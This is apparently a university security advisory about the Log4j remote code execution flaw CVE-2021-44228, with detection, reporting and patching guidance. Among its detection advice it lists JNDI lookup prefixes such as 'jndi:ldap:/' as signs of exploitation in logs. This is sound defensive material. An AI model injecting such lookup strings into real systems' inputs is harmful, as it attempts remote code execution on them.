On December 9, 2021, a critical remote code execution vulnerability was publicly disclosed affecting multiple versions of the open-source Apache Log4j logging framework. This vulnerability has been assigned CVE-2021-44228.
Log4j is widely used in many applications and may be present as an embedded dependency in many commercial or open-source products. These may include commercial applications, locally developed applications, and cloud services. IT Pros can identify if their systems are affected by examining log files for any services utilizing Log4j. Logs containing client-controlled strings such as user-agent, URL strings, or form field submissions are potentially vulnerable. The presence of 'jndi' strings in log events may indicate attempts at exploitation.
Examples include: ‘jndi:ldap:/', ‘jndi:rmi:/', ‘jndi:ldaps:/', or ‘jndi:dns:/'.
Note, this is not an exhaustive list.
Upon identification of exploitation attempts, immediately initiate incident response procedures and notify the University Information Security Office (UISO) via firstname.lastname@example.org.
The vulnerability impacts Apache Log4j versions 2.0 to 2.15, however 1.x versions are no longer supported and may also be vulnerable. Any service or application using the log4j framework to write log data to disk may be at risk and should be evaluated.
For a comprehensive list please see: https://github.com/cisagov/log4j-affected-db
The UISO has observed local exploitation of this vulnerability. CISA has observed numerous threat actors engaged in widespread Internet-based exploitation of this vulnerability.
Admins must patch to log4j-2.16.0 or newer. For commercial products, install vendor supplied updates; if no updates are available, inquire with vendor support as soon as possible and restrict access to systems via host-based or data center firewalls until patches can be applied. Mitigations for versions earlier than 2.15 are not effective.